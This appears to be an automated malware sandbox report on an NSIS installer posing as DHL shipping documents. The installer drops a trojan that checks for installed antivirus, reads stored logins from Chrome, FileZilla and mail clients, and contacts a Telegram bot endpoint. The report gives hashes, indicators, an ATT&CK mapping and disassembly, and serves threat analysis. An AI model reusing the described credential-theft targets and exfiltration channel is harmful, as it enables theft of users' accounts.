                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 1_2_0106BA43 GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,QueryPerformanceCounter,1_2_0106BA43
                Source: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

                Stealing of Sensitive Information

                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.3c15530.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.1290000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.3c15530.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.1290000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.tdbwdaltxz.exe.ee3658.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.417058.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.tdbwdaltxz.exe.ed0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.f0cf58.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.417058.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.2b40000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.tdbwdaltxz.exe.ed0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.f0cf58.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.tdbwdaltxz.exe.ee3658.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.520282991.0000000003C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.519618240.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.519032371.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: tdbwdaltxz.exe PID: 5884, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: tdbwdaltxz.exe PID: 5864, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

                Remote Access Functionality

                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.3c15530.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.1290000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.3c15530.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.1290000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.tdbwdaltxz.exe.ee3658.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.417058.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.tdbwdaltxz.exe.ed0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.f0cf58.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.417058.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.2b40000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.tdbwdaltxz.exe.ed0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.f0cf58.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.tdbwdaltxz.exe.ee3658.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.520282991.0000000003C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.519618240.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.519032371.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: tdbwdaltxz.exe PID: 5884, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: tdbwdaltxz.exe PID: 5864, type: MEMORYSTR
                Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                Valid Accounts1
                Windows Management Instrumentation
                11
                Windows Service
                1
                Access Token Manipulation
                1
                Disable or Modify Tools
                2
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services11
                Archive Collected Data
                Exfiltration Over Other Network Medium1
                Ingress Tool Transfer
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                System Shutdown/Reboot
                Default Accounts21
                Native API
                Boot or Logon Initialization Scripts11
                Windows Service
                11
                Deobfuscate/Decode Files or Information
                LSASS Memory2
                File and Directory Discovery
                Remote Desktop Protocol2
                Data from Local System
                Exfiltration Over Bluetooth1
                Encrypted Channel
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain Accounts3
                Command and Scripting Interpreter
                Logon Script (Windows)111
                Process Injection
                31
                Obfuscated Files or Information
                Security Account Manager37
                System Information Discovery
                SMB/Windows Admin Shares1
                Email Collection
                Automated Exfiltration2
                Non-Application Layer Protocol
                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local Accounts1
                Service Execution
                Logon Script (Mac)Logon Script (Mac)1
                Software Packing
                NTDS141
                Security Software Discovery
                Distributed Component Object Model1
                Clipboard Data
                Scheduled Transfer12
                Application Layer Protocol
                SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                Access Token Manipulation
                LSA Secrets1
                Process Discovery
                SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common111
                Process Injection
                Cached Domain Credentials1
                Remote System Discovery
                VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                System Network Configuration Discovery
                Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                | Source | Detection | Scanner | Label | Link |
                | --- | --- | --- | --- | --- |
                | DHL AWB SHIPPING DOCS_AWB_0009123.exe | 44% | ReversingLabs | Win32.Trojan.Nsisx | |
                | DHL AWB SHIPPING DOCS_AWB_0009123.exe | 37% | Virustotal | | Browse |

                | Source | Detection | Scanner | Label | Link |
                | --- | --- | --- | --- | --- |
                | C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe | 23% | ReversingLabs | Win32.Trojan.InjectorX | |
                | C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe | 13% | Virustotal | | Browse |

                | Source | Detection | Scanner | Label | Link | Download |
                | --- | --- | --- | --- | --- | --- |
                | 2.2.tdbwdaltxz.exe.400000.1.unpack | 100% | Avira | TR/ATRAPS.Gen | | Download File |
                | 2.2.tdbwdaltxz.exe.2b40000.5.unpack | 100% | Avira | HEUR/AGEN.1203035 | | Download File |

                | Source | Detection | Scanner | Label | Link |
                | --- | --- | --- | --- | --- |
                | checkip.dyndns.com | 0% | Virustotal | | Browse |
                | checkip.dyndns.org | 0% | Virustotal | | Browse |

                | Source | Detection | Scanner | Label | Link |
                | --- | --- | --- | --- | --- |
                | http://checkip.dyndns.org4 | 0% | URL Reputation | safe | |
                | http://checkip.dyndns.org | 0% | URL Reputation | safe | |
                | http://checkip.dyndns.org/ | 0% | URL Reputation | safe | |
                | http://schemas.m | 0% | URL Reputation | safe | |
                | http://checkip.dyndns.com | 0% | URL Reputation | safe | |
                | http://checkip.dyndns.com | 0% | URL Reputation | safe | |
                | http://checkip.dyndns.org/q | 0% | URL Reputation | safe | |
                | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
                | --- | --- | --- | --- | --- | --- |
                | checkip.dyndns.com | 193.122.6.168 | true | true | | unknown |
                | checkip.dyndns.org | unknown | unknown | true | | unknown |

                | Name | Malicious | Antivirus Detection | Reputation |
                | --- | --- | --- | --- |
                | http://checkip.dyndns.org/ | true | URL Reputation: safe | unknown |

                | Name | Source | Malicious | Antivirus Detection | Reputation |
                | --- | --- | --- | --- | --- |
                | http://checkip.dyndns.org4 | tdbwdaltxz.exe, 00000002.00000002.519971304.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
                | http://checkip.dyndns.org | tdbwdaltxz.exe, 00000002.00000002.519971304.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, tdbwdaltxz.exe, 00000002.00000002.519971304.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
                | http://schemas.m | tdbwdaltxz.exe | false | URL Reputation: safe | unknown |
                | http://checkip.dyndns.com | tdbwdaltxz.exe, 00000002.00000002.519971304.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown |
                | http://nsis.sf.net/NSIS_ErrorError | DHL AWB SHIPPING DOCS_AWB_0009123.exe | false | | high |
                | https://api.telegram.org/bot | tdbwdaltxz.exe, tdbwdaltxz.exe, 00000002.00000002.520282991.0000000003C11000.00000004.00000800.00020000.00000000.sdmp, tdbwdaltxz.exe, 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, tdbwdaltxz.exe, 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, tdbwdaltxz.exe, 00000002.00000002.519032371.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, tdbwdaltxz.exe, 00000002.00000002.519618240.0000000002B42000.00000040.00001000.00020000.00000000.sdmp | false | | high |
                | http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | tdbwdaltxz.exe, 00000002.00000002.519971304.0000000002C11000.00000004.00000800.00020000.00000000.sdmp | false | | high |
                | http://checkip.dyndns.org/q | tdbwdaltxz.exe, 00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmp, tdbwdaltxz.exe, 00000002.00000002.520282991.0000000003C11000.00000004.00000800.00020000.00000000.sdmp, tdbwdaltxz.exe, 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, tdbwdaltxz.exe, 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, tdbwdaltxz.exe, 00000002.00000002.519032371.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, tdbwdaltxz.exe, 00000002.00000002.519618240.0000000002B42000.00000040.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
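                      | IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
                      | --- | --- | --- | --- | --- | --- | --- |
                      | 193.122.6.168 | checkip.dyndns.com | United States | | 31898 | ORACLE-BMC-31898US | true |

                      | IP |
                      | --- |
                      | 192.168.2.1 |
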
                      Joe Sandbox Version:36.0.0 Rainbow Opal
                      Analysis ID:800700
                      Start date and time:2023-02-07 18:23:13 +01:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 9m 42s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:14
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample file name:DHL AWB SHIPPING DOCS_AWB_0009123.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@7/5@2/2
                      EGA Information:
                      • Successful, ratio: 100%
                      HDC Information:
                      • Successful, ratio: 24% (good quality ratio 22.1%)
                      • Quality average: 81.2%
                      • Quality standard deviation: 30.1%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 74
                      • Number of non-executed functions: 105
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Exclude process from analysis (whitelisted): SgrmBroker.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report creation exceeded maximum time and may have missing disassembly code information.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      | Time | Type | Description |
                      | --- | --- | --- |
                      | 18:25:30 | API Interceptor | 1x Sleep call for process: MpCmdRun.exe modified |
                      • 158.101.44.242
                      INVOICE 0029020 2023_pdf.exeGet hashmaliciousBrowse
                      • 158.101.44.242
                      https://ultrawidesnowboards.com/url?link=https://notice5673993040240404notice477488-ev2rr.pagemaker.link/notice-5673993040240404-notice-477488Get hashmaliciousBrowse
                      • 134.70.16.1
                      Dekont_202302061533908 pdf.exeGet hashmaliciousBrowse
                      • 193.122.130.0
                      98764567890-0876.exeGet hashmaliciousBrowse
                      • 193.122.6.168
                      No context
                      No context
                      Process:C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):384998
                      Entropy (8bit):7.53345051811731
                      Encrypted:false
                      SSDEEP:6144:GiNgXKy76cANX89+opVo/l5YuNWfD4uFKjUP8dIZpSuAL+/zVM4/aN8OCTGdc+Vo:GiN1lcANX8kopVo/l5YuNiD4djBdM3Am
                      MD5:C2CBFC18756BC145C8A0907ED158105A
                      SHA1:87E0D94172166CBD10BF258BA60062662A073F96
                      SHA-256:3D567DCC795B1B3BF6E755BBA0ADF2FB9C771039CFCA9BC8B1C9EFA0D4C5059C
                      SHA-512:4ACEAD4873FCAFA93C771CB969D4CD315C32B6374F2FA4B03DB45606DF3F714C421E668421A6D5ACBE0BB9605DF9FE13F6193EA99FB46C8935E5756E9206E1FD
                      Malicious:false
                      Reputation:low
                      Process:C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):5952
                      Entropy (8bit):7.144643695336174
                      Encrypted:false
                      SSDEEP:96:Farc6oYTg/DrYu0bk2XO5oSw0Qj7KPZ4dNriFdndNiPKqWuAbS4Vuw1OlH1l9I:FarcRXYhX1SJSKPZQRinndcZ2bS4Vuw7
                      MD5:6C5E26AD7985FBE1F56D400664E1F130
                      SHA1:6719DF376987B06E9D5410931F3341D0F34CBF14
                      SHA-256:28240426EE93AFD8466A587C3E1985F410136B71CA176C7AF36CF0E01153C32D
                      SHA-512:484BDF3D8FAC11086184A3300BEFAF4E7EC19C6CBD82FD15387BB2FC2240B7D2770767A0953D77A799069E096A89039AEDD35DE6C85F1A44CEF00AE062C57424
                      Malicious:false
                      Reputation:low
                      Process:C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe
                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):133120
                      Entropy (8bit):6.4113662500317306
                      Encrypted:false
                      SSDEEP:1536:idx1IKgbTK9n+iO2UzWe1+M+v6TGabh/b9QWWGuld6YpcA2suPtMO/b6qf7meggO:g1+a614qVbh/b9QWpocYpxEtPf7megt
                      MD5:377552A9A2C84B8C55314176A566C079
                      SHA1:EEDD3BD9AE6661E41BD8CE989AEF58383AB5B360
                      SHA-256:4ADA7E83E7FFA97F90588475D5C9356A9F1003E1CC7721D227CA0609EF23E9DC
                      SHA-512:554D8AAEBBB117E12798F6B7CADA554A49F332F91912A44503709E6022387A06FD46DBFA47E5E0B855DD5331A451C4C502AA77589533671BEA894B1B62C7D389
                      Malicious:true
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 23%
                      • Antivirus: Virustotal, Detection: 13%, Browse
                      Reputation:low
                      Process:C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):231188
                      Entropy (8bit):7.955184590739643
                      Encrypted:false
                      SSDEEP:6144:6iNgXKy76cANX89+opVo/l5YuNWfD4uFKjUP8dIZpSuAL+/zVM4/aN8OCX:6iN1lcANX8kopVo/l5YuNiD4djBdM3AS
                      MD5:912FD2CFFA357488F81E8C626E176050
                      SHA1:67ED3E87F65DC8DA0522AD5246BB9307A5C451E0
                      SHA-256:EF39E2F328D3AF0F953FBE899102F6689A41F12D5160F005815D4F619D9BFD31
                      SHA-512:602109846C9CA54898775F4E24761759FC9D87805B44301BFDABC5C6A4D4414A37414E9DDBDC0370CF642A717689A71EDFEBB6EB2DE664A2DE5819A6882706B0
                      Malicious:false
                      Reputation:low
                      Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:modified
                      Size (bytes):10874
                      Entropy (8bit):3.164510375794696
                      Encrypted:false
                      SSDEEP:192:cY+38+DJl+ibJ6+ioJJ+i3N+WtT+E9tD+Ett3d+E3z5+6I3+zJE+v:j+s+v+b+P+m+0+Q+q+q+73+zG+v
                      MD5:689711D9AFE7F82E830AA6B2B8A2B83C
                      SHA1:F6457E7D7B5120C6C80F9456412816CFB3F9B0E7
                      SHA-256:A3D02EC8E3DF05FC4CBF1BD7B57E7DCDC051F6D50C71BC0B3B7E0EF42154962F
                      SHA-512:B8D3DAC5FB3B2862C889B012F1BB740F9E6E4AB62E010070B0148E26276863D86C839C8CB0C29C85EBA87B8DDDFE10F8CBB21F0681754643430178C648D778D2
                      Malicious:false
                      Reputation:low
                      Preview:
                      MpCmdRun: Command Line: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                       Start Time: Thu Jun 27 2019 01:29:49
                      MpEnsureProcessMitigationPolicy: hr = 0x1
                      WDEnable
                      ERROR: MpWDEnable(TRUE) failed (800704EC)
                      MpCmdRun: End Time: Thu Jun 27 2019 01:29:49
                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                      Entropy (8bit):7.186130988184906
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:DHL AWB SHIPPING DOCS_AWB_0009123.exe
                      File size:459101
                      MD5:cf98f42b9d4bbdc20e54e7e0ca7543c0
                      SHA1:2543080386230d110b18e1b653c14d1d640998da
                      SHA256:f7b57c7265e87bee11e652eba90afe3e0c34f691cd8faf3b79fe8def96044831
                      SHA512:2a84ede5f78203d417dd00af7f70e6bc2d50f5fc3859684a10be7e2448262b1e9334c6dfc064df7feb1b302d01b9b41ce8a9880473f246bf6af7cb601c9875f0
                      SSDEEP:6144:sYa6RpFXx6QR4FUJE0S3u+vMwejAFbF6L5XamozD/DDX2zA:sYjpFXxJR40Ef3NMwekf6L5amozD3t
                      TLSH:9AA4E68118CFC40DC35E3633A5E1C52A68D0CE326057632E771ABF8EB53BB4A5B4E659
                      Icon Hash:e8f0e84c44e4e4f8
                      Entrypoint:0x403640
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Time Stamp:0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:61259b55b8912888e90f516ca08dc514
                      Instruction
                      push ebp
                      mov ebp, esp
                      sub esp, 000003F4h
                      push ebx
                      push esi
                      push edi
                      push 00000020h
                      pop edi
                      xor ebx, ebx
                      push 00008001h
                      mov dword ptr [ebp-14h], ebx
                      mov dword ptr [ebp-04h], 0040A230h
                      mov dword ptr [ebp-10h], ebx
                      call dword ptr [004080C8h]
                      mov esi, dword ptr [004080CCh]
                      lea eax, dword ptr [ebp-00000140h]
                      push eax
                      mov dword ptr [ebp-0000012Ch], ebx
                      mov dword ptr [ebp-2Ch], ebx
                      mov dword ptr [ebp-28h], ebx
                      mov dword ptr [ebp-00000140h], 0000011Ch
                      call esi
                      test eax, eax
                      jne 00007F336C80B17Ah
                      lea eax, dword ptr [ebp-00000140h]
                      mov dword ptr [ebp-00000140h], 00000114h
                      push eax
                      call esi
                      mov ax, word ptr [ebp-0000012Ch]
                      mov ecx, dword ptr [ebp-00000112h]
                      sub ax, 00000053h
                      add ecx, FFFFFFD0h
                      neg ax
                      sbb eax, eax
                      mov byte ptr [ebp-26h], 00000004h
                      not eax
                      and eax, ecx
                      mov word ptr [ebp-2Ch], ax
                      cmp dword ptr [ebp-0000013Ch], 0Ah
                      jnc 00007F336C80B14Ah
                      and word ptr [ebp-00000132h], 0000h
                      mov eax, dword ptr [ebp-00000134h]
                      movzx ecx, byte ptr [ebp-00000138h]
                      mov dword ptr [0042A318h], eax
                      xor eax, eax
                      mov ah, byte ptr [ebp-0000013Ch]
                      movzx eax, ax
                      or eax, ecx
                      xor ecx, ecx
                      mov ch, byte ptr [ebp-2Ch]
                      movzx ecx, cx
                      shl eax, 10h
                      or eax, ecx
                      Programming Language:
                      • [EXP] VC++ 6.0 SP5 build 8804
                      Name | Virtual Address | Virtual Size | Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8504 | 0xa0 | .rdata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3b000 | 0x2a610 | .rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                      Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                      .text | 0x1000 | 0x6676 | 0x6800 | False | 0.6568134014423077 | data | 6.4174599871908855 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .rdata | 0x8000 | 0x139a | 0x1400 | False | 0.4498046875 | data | 5.141066817170598 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .data | 0xa000 | 0x20378 | 0x600 | False | 0.509765625 | data | 4.110582127654237 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .ndata | 0x2b000 | 0x10000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc | 0x3b000 | 0x2a610 | 0x2a800 | False | 0.15715188419117648 | data | 4.69978633667236 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      Name | RVA | Size | Type | Language | Country
                      RT_ICON | 0x3b358 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States
                      RT_ICON | 0x4bb80 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States
                      RT_ICON | 0x55028 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States
                      RT_ICON | 0x5a4b0 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States
                      RT_ICON | 0x5e6d8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States
                      RT_ICON | 0x60c80 | 0x225f | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
                      RT_ICON | 0x62ee0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States
                      RT_ICON | 0x63f88 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States
                      RT_ICON | 0x64910 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States
                      RT_DIALOG | 0x64d78 | 0x100 | data | English | United States
                      RT_DIALOG | 0x64e78 | 0x11c | data | English | United States
                      RT_DIALOG | 0x64f98 | 0x60 | data | English | United States
                      RT_GROUP_ICON | 0x64ff8 | 0x84 | data | English | United States
                      RT_VERSION | 0x65080 | 0x250 | data | English | United States
                      RT_MANIFEST | 0x652d0 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States
                      DLL | Import
